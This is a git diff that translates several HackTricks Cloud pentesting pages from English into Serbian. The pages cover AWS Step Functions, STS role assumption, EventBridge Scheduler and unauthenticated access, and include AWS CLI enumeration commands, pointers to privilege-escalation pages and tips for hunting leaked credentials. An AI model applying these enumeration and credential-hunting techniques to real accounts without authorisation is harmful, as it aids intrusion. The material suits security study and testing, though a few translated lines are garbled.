-  "Resource": "arn:aws:states:::lambda:invoke",
-  "Parameters": {
-    "Payload.$": "$",
-    "FunctionName": "arn:aws:lambda:::function:HelloWorld"
-  },
-  "End": true
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"Parameters": {
+"Payload.$": "$",
+"FunctionName": "arn:aws:lambda:::function:HelloWorld"
+},
+"End": true
 }
 ```
-
 ### Choice
 
-A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results.
+**Choice** stanje dodaje uslovnu logiku u radni tok, omogućavajući odluke na osnovu ulaznih podataka. Evaluira navedene uslove i prelazi u odgovarajuće stanje na osnovu rezultata.
 
-- **Comparison**: Each choice rule includes a comparison operator (e.g., **`NumericEquals`**, **`StringEquals`**) that compares an input variable to a specified value or another variable.
-- **Next Field**: Choice states do not support don't support the **`End`** field, instead, they define the **`Next`** state to transition to if the comparison is true.
-
-Example of **Choice** state:
+- **Comparison**: Svako pravilo izbora uključuje operator poređenja (npr., **`NumericEquals`**, **`StringEquals`**) koji upoređuje ulaznu promenljivu sa navedenom vrednošću ili drugom promenljivom.
+- **Next Field**: Choice stanja ne podržavaju **`End`** polje, umesto toga definišu **`Next`** stanje u koje prelaze ako je poređenje tačno.
 
+Primer **Choice** stanja:
 ```json
 {
-  "Variable": "$.timeStamp",
-  "TimestampEquals": "2000-01-01T00:00:00Z",
-  "Next": "TimeState"
+"Variable": "$.timeStamp",
+"TimestampEquals": "2000-01-01T00:00:00Z",
+"Next": "TimeState"
 }
 ```
-
 ### Fail/Succeed
 
-A **`Fail`** state stops the execution of a state machine and marks it as a failure. It is used to specify an error name and a cause, providing details about the failure. This state is terminal, meaning it ends the execution flow.
+A **`Fail`** stanje zaustavlja izvršenje mašine stanja i označava je kao neuspeh. Koristi se za specificiranje imena greške i uzroka, pružajući detalje o neuspehu. Ovo stanje je terminalno, što znači da završava tok izvršenja.
 
-A **`Succeed`** state stops the execution successfully. It is typically used to terminate the workflow when it completes successfully. This state does not require a **`Next`** field.
+A **`Succeed`** stanje uspešno zaustavlja izvršenje. Obično se koristi za prekid radnog toka kada se uspešno završi. Ovo stanje ne zahteva **`Next`** polje.
 
 {{#tabs }}
 {{#tab name="Fail example" }}
-
 ```json
 "FailState": {
-  "Type": "Fail",
-  "Error": "ErrorName",
-  "Cause": "Error details"
+"Type": "Fail",
+"Error": "ErrorName",
+"Cause": "Error details"
 }
 ```
-
 {{#endtab }}
 
-{{#tab name="Succeed example" }}
-
+{{#tab name="Primer uspeha" }}
 ```json
 "SuccessState": {
-  "Type": "Succeed"
+"Type": "Succeed"
 }
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 ### Pass
 
-A **Pass** state passes its input to its output either without performing any work or transformin JSON state input using filters, and then passing the transformed data to the next state. It is useful for testing and constructing state machines, allowing you to inject static data or transform it.
-
+**Pass** stanje prosleđuje svoj ulaz svom izlazu ili bez obavljanja bilo kakvog posla ili transformišući JSON ulaz stanja koristeći filtre, a zatim prosleđuje transformisane podatke sledećem stanju. Korisno je za testiranje i konstruisanje stanja mašina, omogućavajući vam da ubacite statičke podatke ili ih transformišete.
 ```json
 "PassState": {
-  "Type": "Pass",
-  "Result": {"key": "value"},
-  "ResultPath": "$.newField",
-  "Next": "NextState"
+"Type": "Pass",
+"Result": {"key": "value"},
+"ResultPath": "$.newField",
+"Next": "NextState"
+}
+```
+### Wait
+
+A **Wait** stanje odlaže izvršenje mašine stanja na određeni vremenski period. Postoje tri osnovne metode za podešavanje vremena čekanja:
+
+- **X Sekundi**: Fiksan broj sekundi za čekanje.
+
+```json
+"WaitState": {
+"Type": "Wait",
+"Seconds": 10,
+"Next": "NextState"
 }
 ```
 
-### Wait
+- **Apsolutni vremenski pečat**: Tačno vreme do kada treba čekati.
 
-A **Wait** state delays the execution of the state machine for a specified duration. There are three primary methods to configure the wait time:
+```json
+"WaitState": {
+"Type": "Wait",
+"Timestamp": "2024-03-14T01:59:00Z",
+"Next": "NextState"
+}
+```
 
-- **X Seconds**: A fixed number of seconds to wait.
+- **Dinamičko čekanje**: Na osnovu ulaza koristeći **`SecondsPath`** ili **`TimestampPath`**.
 
-  ```json
-  "WaitState": {
-  	"Type": "Wait",
-  	"Seconds": 10,
-  	"Next": "NextState"
-  }
-  ```
-
-- **Absolute Timestamp**: An exact time to wait until.
-
-  ```json
-  "WaitState": {
-    "Type": "Wait",
-    "Timestamp": "2024-03-14T01:59:00Z",
-    "Next": "NextState"
-  }
-  ```
-
-- **Dynamic Wait**: Based on input using **`SecondsPath`** or **`TimestampPath`**.
-
-  ```json
-  jsonCopiar código
-  "WaitState": {
-    "Type": "Wait",
-    "TimestampPath": "$.expirydate",
-    "Next": "NextState"
-  }
-  ```
+```json
+jsonCopiar código
+"WaitState": {
+"Type": "Wait",
+"TimestampPath": "$.expirydate",
+"Next": "NextState"
+}
+```
 
 ### Parallel
 
-A **Parallel** state allows you to execute multiple branches of tasks concurrently within your workflow. Each branch runs independently and processes its own sequence of states. The execution waits until all branches complete before proceeding to the next state. Its key fields are:
-
-- **Branches**: An array defining the parallel execution paths. Each branch is a separate state machine.
-- **ResultPath**: Defines where (in the input) to place the combined output of the branches.
-- **Retry and Catch**: Error handling configurations for the parallel state.
+A **Parallel** stanje omogućava vam da izvršavate više grana zadataka istovremeno unutar vašeg radnog toka. Svaka grana se izvršava nezavisno i obrađuje svoju vlastitu sekvencu stanja. Izvršenje čeka dok sve grane ne završe pre nego što pređe na sledeće stanje. Njegova ključna polja su:
 
+- **Grane**: Niz koji definiše paralelne putanje izvršenja. Svaka grana je posebna mašina stanja.
+- **ResultPath**: Definiše gde (u ulazu) da se postavi kombinovani izlaz grana.
+- **Retry i Catch**: Konfiguracije za obradu grešaka za paralelno stanje.
 ```json
 "ParallelState": {
-  "Type": "Parallel",
-  "Branches": [
-    {
-      "StartAt": "Task1",
-      "States": { ... }
-    },
-    {
-      "StartAt": "Task2",
-      "States": { ... }
-    }
-  ],
-  "Next": "NextState"
+"Type": "Parallel",
+"Branches": [
+{
+"StartAt": "Task1",
+"States": { ... }
+},
+{
+"StartAt": "Task2",
+"States": { ... }
+}
+],
+"Next": "NextState"
+}
+```
+### Map
+
+A **Map** stanje omogućava izvršavanje skupa koraka za svaki predmet u skupu podataka. Koristi se za paralelnu obradu podataka. U zavisnosti od toga kako želite da obradite stavke skupa podataka, Step Functions pruža sledeće režime:
+
+- **Inline Mode**: Izvršava podskup stanja za svaki predmet JSON niza. Pogodno za male zadatke sa manje od 40 paralelnih iteracija, izvršavajući svaku od njih u kontekstu radnog toka koji sadrži **`Map`** stanje.
+
+```json
+"MapState": {
+"Type": "Map",
+"ItemsPath": "$.arrayItems",
+"ItemProcessor": {
+"ProcessorConfig": {
+"Mode": "INLINE"
+},
+"StartAt": "AddState",
+"States": {
+"AddState": {
+"Type": "Task",
+"Resource": "arn:aws:states:::lambda:invoke",
+"OutputPath": "$.Payload",
+"Parameters": {
+"FunctionName": "arn:aws:lambda:::function:add-function"
+},
+"End": true
+}
+}
+},
+"End": true
+"ResultPath": "$.detail.added",
+"ItemsPath": "$.added"
 }
 ```
 
-### Map
+- **Distributed Mode**: Dizajniran za obradu velikih razmera sa visokom konkurencijom. Podržava obradu velikih skupova podataka, kao što su oni pohranjeni u Amazon S3, omogućavajući visoku konkurenciju do 10,000 paralelnih izvršavanja radnog toka, izvršavajući ove decu kao odvojeno izvršavanje.
 
-A **Map** state enables the execution of a set of steps for each item in an dataset. It's used for parallel processing of data. Depending on how you want to process the items of the dataset, Step Functions provides the following modes:
-
-- **Inline Mode**: Executes a subset of states for each JSON array item. Suitable for small-scale tasks with less than 40 parallel iterations, running each of them in the context of the workflow that contains the **`Map`** state.
-
-  ```json
-  "MapState": {
-    "Type": "Map",
-    "ItemsPath": "$.arrayItems",
-    "ItemProcessor": {
-        "ProcessorConfig": {
-            "Mode": "INLINE"
-        },
-        "StartAt": "AddState",
-        "States": {
-            "AddState": {
-                "Type": "Task",
-                "Resource": "arn:aws:states:::lambda:invoke",
-                "OutputPath": "$.Payload",
-                "Parameters": {
-                    "FunctionName": "arn:aws:lambda:::function:add-function"
-                },
-                "End": true
-            }
-        }
-    },
-    "End": true
-    "ResultPath": "$.detail.added",
-    "ItemsPath": "$.added"
-  }
-  ```
-
-- **Distributed Mode**: Designed for large-scale parallel processing with high concurrency. Supports processing large datasets, such as those stored in Amazon S3, enabling a high concurrency of up 10,000 parallel child workflow executions, running these child as a separate child execution.
-
-  ```json
-  "DistributedMapState": {
-    "Type": "Map",
-    "ItemReader": {
-      "Resource": "arn:aws:states:::s3:getObject",
-      "Parameters": {
-        "Bucket": "my-bucket",
-        "Key": "data.csv"
-      }
-    },
-    "ItemProcessor": {
-      "ProcessorConfig": {
-        "Mode": "DISTRIBUTED",
-        "ExecutionType": "EXPRESS"
-      },
-      "StartAt": "ProcessItem",
-      "States": {
-        "ProcessItem": {
-          "Type": "Task",
-          "Resource": "arn:aws:lambda:region:account-id:function:my-function",
-          "End": true
-  	    }
-      }
-    },
-    "End": true
-    "ResultWriter": {
-      "Resource": "arn:aws:states:::s3:putObject",
-      "Parameters": {
-        "Bucket": "myOutputBucket",
-        "Prefix": "csvProcessJobs"
-  	  }
-  	}
-  }
-  ```
+```json
+"DistributedMapState": {
+"Type": "Map",
+"ItemReader": {
+"Resource": "arn:aws:states:::s3:getObject",
+"Parameters": {
+"Bucket": "my-bucket",
+"Key": "data.csv"
+}
+},
+"ItemProcessor": {
+"ProcessorConfig": {
+"Mode": "DISTRIBUTED",
+"ExecutionType": "EXPRESS"
+},
+"StartAt": "ProcessItem",
+"States": {
+"ProcessItem": {
+"Type": "Task",
+"Resource": "arn:aws:lambda:region:account-id:function:my-function",
+"End": true
+}
+}
+},
+"End": true
+"ResultWriter": {
+"Resource": "arn:aws:states:::s3:putObject",
+"Parameters": {
+"Bucket": "myOutputBucket",
+"Prefix": "csvProcessJobs"
+}
+}
+}
+```
 
 ### Versions and aliases
 
-Step Functions also lets you manage workflow deployments through **versions** and **aliases** of state machines. A version represents a snapshot of a state machine that can be executed. Aliases serve as pointers to up to two versions of a state machine.
+Step Functions takođe omogućava upravljanje implementacijama radnog toka kroz **verzije** i **alias** mašina stanja. Verzija predstavlja snimak mašine stanja koji može biti izvršen. Alias služi kao pokazivač na do dve verzije mašine stanja.
 
-- **Versions**: These immutable snapshots of a state machine are created from the most recent revision of that state machine. Each version is identified by a unique ARN that combines the state machine ARN with the version number, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Versions cannot be edited, but you can update the state machine and publish a new version, or use the desired state machine version.
-- **Aliases**: These pointers can reference up to two versions of the same state machine. Multiple aliases can be created for a single state machine, each identified by a unique ARN constructed by combining the state machine ARN with the alias name, separated by a colon (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Aliases enable routing of traffic between one of the two versions of a state machine. Alternatively, an alias can point to a single specific version of the state machine, but not to other aliases. They can be updated to redirect to a different version of the state machine as needed, facilitating controlled deployments and workflow management.
+- **Versions**: Ovi nepromenljivi snimci mašine stanja kreiraju se iz najnovije revizije te mašine stanja. Svaka verzija se identifikuje jedinstvenim ARN-om koji kombinuje ARN mašine stanja sa brojem verzije, odvojenim dvotačkom (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:version-number`**). Verzije se ne mogu uređivati, ali možete ažurirati mašinu stanja i objaviti novu verziju, ili koristiti željenu verziju mašine stanja.
+- **Aliases**: Ovi pokazivači mogu referencirati do dve verzije iste mašine stanja. Više alias-a može biti kreirano za jednu mašinu stanja, svaki identifikovan jedinstvenim ARN-om konstruisanim kombinovanjem ARN mašine stanja sa imenom alias-a, odvojenim dvotačkom (**`arn:aws:states:region:account-id:stateMachine:StateMachineName:aliasName`**). Alias omogućava usmeravanje saobraćaja između jedne od dve verzije mašine stanja. Alternativno, alias može ukazivati na jednu specifičnu verziju mašine stanja, ali ne na druge alias-e. Mogu se ažurirati da preusmere na drugu verziju mašine stanja po potrebi, olakšavajući kontrolisane implementacije i upravljanje radnim tokom.
 
-For more detailed information about **ASL**, check: [**Amazon States Language**](https://states-language.net/spec.html).
+Za detaljnije informacije o **ASL**, proverite: [**Amazon States Language**](https://states-language.net/spec.html).
 
 ## IAM Roles for State machines
 
-AWS Step Functions utilizes AWS Identity and Access Management (IAM) roles to control access to resources and actions within state machines. Here are the key aspects related to security and IAM roles in AWS Step Functions:
+AWS Step Functions koristi AWS Identity and Access Management (IAM) uloge za kontrolu pristupa resursima i akcijama unutar mašina stanja. Evo ključnih aspekata vezanih za bezbednost i IAM uloge u AWS Step Functions:
 
-- **Execution Role**: Each state machine in AWS Step Functions is associated with an IAM execution role. This role defines what actions the state machine can perform on your behalf. When a state machine transitions between states that interact with AWS services (like invoking Lambda functions, accessing DynamoDB, etc.), it assumes this execution role to carry out those actions.
-- **Permissions**: The IAM execution role must be configured with permissions that allow the necessary actions on other AWS services. For example, if your state machine needs to invoke AWS Lambda functions, the IAM role must have **`lambda:InvokeFunction`** permissions. Similarly, if it needs to write to DynamoDB, appropriate permissions (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, etc.) must be granted.
+- **Execution Role**: Svaka mašina stanja u AWS Step Functions je povezana sa IAM ulogom izvršenja. Ova uloga definiše koje akcije mašina stanja može izvesti u vaše ime. Kada mašina stanja prelazi između stanja koja komuniciraju sa AWS uslugama (kao što je pozivanje Lambda funkcija, pristup DynamoDB, itd.), preuzima ovu ulogu izvršenja da bi izvršila te akcije.
+- **Permissions**: IAM uloga izvršenja mora biti konfigurisana sa dozvolama koje omogućavaju neophodne akcije na drugim AWS uslugama. Na primer, ako vaša mašina stanja treba da pozove AWS Lambda funkcije, IAM uloga mora imati **`lambda:InvokeFunction`** dozvole. Slično, ako treba da piše u DynamoDB, odgovarajuće dozvole (**`dynamodb:PutItem`**, **`dynamodb:UpdateItem`**, itd.) moraju biti dodeljene.
 
 ## Enumeration
 
-ReadOnlyAccess policy is enough for all the following enumeration actions.
-
+ReadOnlyAccess politika je dovoljna za sve sledeće akcije enumeracije.
 ```bash
 # State machines #
 
@@ -310,10 +297,9 @@ aws stepfunctions describe-map-run --map-run-arn 
 ## Lists executions of a Map Run
 aws stepfunctions list-executions --map-run-arn  [--status-filter ] [--redrive-filter ]
 ```
-
 ## Privesc
 
-In the following page, you can check how to **abuse Step Functions permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite dozvole Step Functions za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-stepfunctions-privesc.md
@@ -338,7 +324,3 @@ In the following page, you can check how to **abuse Step Functions permissions t
 - [https://states-language.net/spec.html](https://states-language.net/spec.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
index 385d55c3b..ad96d33a1 100644
--- a/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-sts-enum.md
@@ -4,62 +4,57 @@
 
 ## STS
 
-**AWS Security Token Service (STS)** is primarily designed to issue **temporary, limited-privilege credentials**. These credentials can be requested for **AWS Identity and Access Management (IAM)** users or for authenticated users (federated users).
+**AWS Security Token Service (STS)** je prvenstveno dizajniran za izdavanje **privremenih, ograničenih privilegija**. Ove privilegije se mogu tražiti za **AWS Identity and Access Management (IAM)** korisnike ili za autentifikovane korisnike (federisane korisnike).
 
-Given that STS's purpose is to **issue credentials for identity impersonation**, the service is immensely valuable for **escalating privileges and maintaining persistence**, even though it might not have a wide array of options.
+S obzirom na to da je svrha STS-a da **izdaje privilegije za impersonaciju identiteta**, usluga je izuzetno vredna za **eskalaciju privilegija i održavanje postojanosti**, iako možda nema širok spektar opcija.
 
 ### Assume Role Impersonation
 
-The action [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) provided by AWS STS is crucial as it permits a principal to acquire credentials for another principal, essentially impersonating them. Upon invocation, it responds with an access key ID, a secret key, and a session token corresponding to the specified ARN.
+Akcija [AssumeRole](https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html) koju pruža AWS STS je ključna jer omogućava principalu da dobije privilegije za drugog principala, suštinski ga impersonira. Nakon poziva, odgovara sa ID-jem pristupnog ključa, tajnim ključem i tokenom sesije koji odgovara specificiranom ARN-u.
 
-For Penetration Testers or Red Team members, this technique is instrumental for privilege escalation (as elaborated [**here**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). However, it's worth noting that this technique is quite conspicuous and may not catch an attacker off guard.
+Za Penetration Testere ili članove Red Teama, ova tehnika je ključna za eskalaciju privilegija (kako je objašnjeno [**ovde**](../aws-privilege-escalation/aws-sts-privesc.md#sts-assumerole)). Međutim, vredi napomenuti da je ova tehnika prilično očigledna i možda neće iznenaditi napadača.
 
 #### Assume Role Logic
 
-In order to assume a role in the same account if the **role to assume is allowing specifically a role ARN** like in:
-
+Da bi se preuzela uloga u istom nalogu, ako **uloga koju treba preuzeti specifično dozvoljava ARN uloge** kao u:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam:::role/priv-role"
-      },
-      "Action": "sts:AssumeRole",
-      "Condition": {}
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::role/priv-role"
+},
+"Action": "sts:AssumeRole",
+"Condition": {}
+}
+]
 }
 ```
+U ovom slučaju, uloga **`priv-role`** **ne mora biti posebno dozvoljena** da preuzme tu ulogu (sa tom dozvolom je dovoljno).
 
-The role **`priv-role`** in this case, **doesn't need to be specifically allowed** to assume that role (with that allowance is enough).
-
-However, if a role is allowing an account to assume it, like in:
-
+Međutim, ako uloga dozvoljava nalogu da je preuzme, kao u:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "arn:aws:iam:::root"
-      },
-      "Action": "sts:AssumeRole",
-      "Condition": {}
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Principal": {
+"AWS": "arn:aws:iam:::root"
+},
+"Action": "sts:AssumeRole",
+"Condition": {}
+}
+]
 }
 ```
+Uloga koju pokušavate da preuzmete će zahtevati **specifičnu `sts:AssumeRole` dozvolu** za tu ulogu **da bi je preuzela**.
 
-The role trying to assume it will need a **specific `sts:AssumeRole` permission** over that role **to assume it**.
-
-If you try to assume a **role** **from a different account**, the **assumed role must allow it** (indicating the role **ARN** or the **external account**), and the **role trying to assume** the other one **MUST** to h**ave permissions to assume it** (in this case this isn't optional even if the assumed role is specifying an ARN).
+Ako pokušate da preuzmete **ulogu** **iz drugog naloga**, **preuzeta uloga mora to da dozvoli** (navodeći **ARN** uloge ili **spoljni nalog**), i **uloga koja pokušava da preuzme** drugu **MORA** da ima dozvole da je preuzme **(u ovom slučaju to nije opcionalno čak i ako preuzeta uloga specificira ARN)**.
 
 ### Enumeration
-
 ```bash
 # Get basic info of the creds
 aws sts get-caller-identity
@@ -72,10 +67,9 @@ aws sts get-session-token
 ## MFA
 aws sts get-session-token --serial-number  --token-code 
 ```
-
 ### Privesc
 
-In the following page you can check how to **abuse STS permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite STS dozvole za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/aws-sts-privesc.md
@@ -98,7 +92,3 @@ In the following page you can check how to **abuse STS permissions to escalate p
 - [https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist](https://blog.christophetd.fr/retrieving-aws-security-credentials-from-the-aws-console/?utm_source=pocket_mylist)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
index a2f2e0c2f..e20310366 100644
--- a/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/eventbridgescheduler-enum.md
@@ -6,49 +6,48 @@
 
 ## EventBridge Scheduler
 
-**Amazon EventBridge Scheduler** is a fully managed, **serverless scheduler designed to create, run, and manage tasks** at scale. It enables you to schedule millions of tasks across over 270 AWS services and 6,000+ API operations, all from a central service. With built-in reliability and no infrastructure to manage, EventBridge Scheduler simplifies scheduling, reduces maintenance costs, and scales automatically to meet demand. You can configure cron or rate expressions for recurring schedules, set one-time invocations, and define flexible delivery windows with retry options, ensuring tasks are reliably delivered based on the availability of downstream targets.
+**Amazon EventBridge Scheduler** je potpuno upravljani, **serverless planer dizajniran za kreiranje, pokretanje i upravljanje zadacima** na velikoj skali. Omogućava vam da zakazujete milione zadataka preko više od 270 AWS usluga i 6,000+ API operacija, sve iz centralne usluge. Sa ugrađenom pouzdanošću i bez infrastrukture za upravljanje, EventBridge Scheduler pojednostavljuje zakazivanje, smanjuje troškove održavanja i automatski se skalira kako bi zadovoljio potražnju. Možete konfigurisati cron ili rate izraze za ponavljajuće rasporede, postaviti jednokratne pozive i definisati fleksibilne vremenske okvire za isporuku sa opcijama ponovnog pokušaja, osiguravajući da se zadaci pouzdano isporučuju na osnovu dostupnosti ciljeva nizvodno.
 
-There is an initial limit of 1,000,000 schedules per region per account. Even the official quotas page suggests, "It's recommended to delete one-time schedules once they've completed." 
+Postoji inicijalni limit od 1,000,000 rasporeda po regionu po nalogu. Čak i zvanična stranica kvota sugeriše: "Preporučuje se da se obrišu jednokratni rasporedi nakon što su završeni." 
 
 ### Types of Schedules
 
-Types of Schedules in EventBridge Scheduler:
+Tipovi rasporeda u EventBridge Scheduler:
 
-1. **One-time schedules** – Execute a task at a specific time, e.g., December 21st at 7 AM UTC.
-2. **Rate-based schedules** – Set recurring tasks based on a frequency, e.g., every 2 hours.
-3. **Cron-based schedules** – Set recurring tasks using a cron expression, e.g., every Friday at 4 PM.
+1. **Jednokratni rasporedi** – Izvršite zadatak u određenom trenutku, npr., 21. decembra u 7 AM UTC.
+2. **Rasporedi zasnovani na frekvenciji** – Postavite ponavljajuće zadatke na osnovu frekvencije, npr., svaka 2 sata.
+3. **Cron rasporedi** – Postavite ponavljajuće zadatke koristeći cron izraz, npr., svake petka u 4 PM.
 
-Two Mechanisms for Handling Failed Events:
+Dva mehanizma za upravljanje neuspelim događajima:
 
-1. **Retry Policy** – Defines the number of retry attempts for a failed event and how long to keep it unprocessed before considering it a failure.
-2. **Dead-Letter Queue (DLQ)** – A standard Amazon SQS queue where failed events are delivered after retries are exhausted. DLQs help in troubleshooting issues with your schedule or its downstream target.
+1. **Politika ponovnog pokušaja** – Definiše broj pokušaja ponovnog izvršavanja za neuspeli događaj i koliko dugo ga zadržati neobrađenim pre nego što se smatra neuspehom.
+2. **Dead-Letter Queue (DLQ)** – Standardna Amazon SQS red čekanja gde se neuspeli događaji isporučuju nakon što su pokušaji ponovnog izvršavanja iscrpljeni. DLQ pomaže u rešavanju problema sa vašim rasporedom ili njegovim ciljem nizvodno.
 
 ### Targets
 
-There are 2 types of targets for a scheduler [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), which are commonly used and AWS made them easier to configure, and [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), which can be used to call any AWS API.
+Postoje 2 tipa ciljeva za planer [**templated (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html), koji se često koriste i AWS ih je učinio lakšim za konfiguraciju, i [**universal (docs)**](https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html), koji se može koristiti za pozivanje bilo kog AWS API-ja.
 
-**Templated targets** support the following services:
+**Templated ciljevi** podržavaju sledeće usluge:
 
 - CodeBuild – StartBuild
 - CodePipeline – StartPipelineExecution
 - Amazon ECS – RunTask
-  - Parameters: EcsParameters
+- Parametri: EcsParameters
 - EventBridge – PutEvents
-  - Parameters: EventBridgeParameters
+- Parametri: EventBridgeParameters
 - Amazon Inspector – StartAssessmentRun
 - Kinesis – PutRecord
-  - Parameters: KinesisParameters
+- Parametri: KinesisParameters
 - Firehose – PutRecord
 - Lambda – Invoke
 - SageMaker – StartPipelineExecution
-  - Parameters: SageMakerPipelineParameters
+- Parametri: SageMakerPipelineParameters
 - Amazon SNS – Publish
 - Amazon SQS – SendMessage
-  - Parameters: SqsParameters
+- Parametri: SqsParameters
 - Step Functions – StartExecution
 
 ### Enumeration
-
 ```bash
 # List all EventBridge Scheduler schedules
 aws scheduler list-schedules
@@ -65,10 +64,9 @@ aws scheduler get-schedule-group --name 
 # List tags for a specific schedule (helpful in identifying any custom tags or permissions)
 aws scheduler list-tags-for-resource --resource-arn 
 ```
-
 ### Privesc
 
-In the following page, you can check how to **abuse eventbridge scheduler permissions to escalate privileges**:
+Na sledećoj stranici možete proveriti kako da **zloupotrebite dozvole eventbridge scheduler-a za eskalaciju privilegija**:
 
 {{#ref}}
 ../aws-privilege-escalation/eventbridgescheduler-privesc.md
@@ -79,7 +77,3 @@ In the following page, you can check how to **abuse eventbridge scheduler permis
 - [https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html](https://docs.aws.amazon.com/scheduler/latest/UserGuide/what-is-scheduler.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
index 0003290b4..fc9bdb796 100644
--- a/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
+++ b/src/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/README.md
@@ -1,58 +1,54 @@
-# AWS - Unauthenticated Enum & Access
+# AWS - Neautentifikovana Enum & Pristup
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## AWS Credentials Leaks
+## AWS Kredencijali Curjenja
 
-A common way to obtain access or information about an AWS account is by **searching for leaks**. You can search for leaks using **google dorks**, checking the **public repos** of the **organization** and the **workers** of the organization in **Github** or other platforms, searching in **credentials leaks databases**... or in any other part you think you might find any information about the company and its cloud infa.\
-Some useful **tools**:
+Uobičajen način za dobijanje pristupa ili informacija o AWS nalogu je **pretraživanje curenja**. Možete pretraživati curenja koristeći **google dorks**, proveravajući **javne repozitorijume** **organizacije** i **radnika** organizacije na **Github-u** ili drugim platformama, pretražujući u **bazama podataka o curenjima kredencijala**... ili na bilo kojem drugom mestu gde mislite da biste mogli pronaći informacije o kompaniji i njenoj cloud infrastrukturi.\
+Neki korisni **alati**:
 
 - [https://github.com/carlospolop/leakos](https://github.com/carlospolop/leakos)
 - [https://github.com/carlospolop/pastos](https://github.com/carlospolop/pastos)
 - [https://github.com/carlospolop/gorks](https://github.com/carlospolop/gorks)
 
-## AWS Unauthenticated Enum & Access
+## AWS Neautentifikovana Enum & Pristup
 
-There are several services in AWS that could be configured giving some kind of access to all Internet or to more people than expected. Check here how:
+Postoji nekoliko usluga u AWS-u koje mogu biti konfigurisane tako da daju neku vrstu pristupa svima na internetu ili većem broju ljudi nego što se očekuje. Proverite ovde kako:
 
-- [**Accounts Unauthenticated Enum**](aws-accounts-unauthenticated-enum.md)
-- [**Cloud9 Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
-- [**Cloudfront Unauthenticated Enum**](aws-cloudfront-unauthenticated-enum.md)
-- [**Cloudsearch Unauthenticated Enum**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
-- [**Cognito Unauthenticated Enum**](aws-cognito-unauthenticated-enum.md)
-- [**DocumentDB Unauthenticated Enum**](aws-documentdb-enum.md)
-- [**EC2 Unauthenticated Enum**](aws-ec2-unauthenticated-enum.md)
-- [**Elasticsearch Unauthenticated Enum**](aws-elasticsearch-unauthenticated-enum.md)
-- [**IAM Unauthenticated Enum**](aws-iam-and-sts-unauthenticated-enum.md)
-- [**IoT Unauthenticated Access**](aws-iot-unauthenticated-enum.md)
-- [**Kinesis Video Unauthenticated Access**](aws-kinesis-video-unauthenticated-enum.md)
-- [**Media Unauthenticated Access**](aws-media-unauthenticated-enum.md)
-- [**MQ Unauthenticated Access**](aws-mq-unauthenticated-enum.md)
-- [**MSK Unauthenticated Access**](aws-msk-unauthenticated-enum.md)
-- [**RDS Unauthenticated Access**](aws-rds-unauthenticated-enum.md)
-- [**Redshift Unauthenticated Access**](aws-redshift-unauthenticated-enum.md)
-- [**SQS Unauthenticated Access**](aws-sqs-unauthenticated-enum.md)
-- [**S3 Unauthenticated Access**](aws-s3-unauthenticated-enum.md)
+- [**Neautentifikovana Enum Naloga**](aws-accounts-unauthenticated-enum.md)
+- [**Neautentifikovana Enum Cloud9**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
+- [**Neautentifikovana Enum Cloudfront**](aws-cloudfront-unauthenticated-enum.md)
+- [**Neautentifikovana Enum Cloudsearch**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-cloud/aws-security/aws-unauthenticated-enum-access/broken-reference/README.md)
+- [**Neautentifikovana Enum Cognito**](aws-cognito-unauthenticated-enum.md)
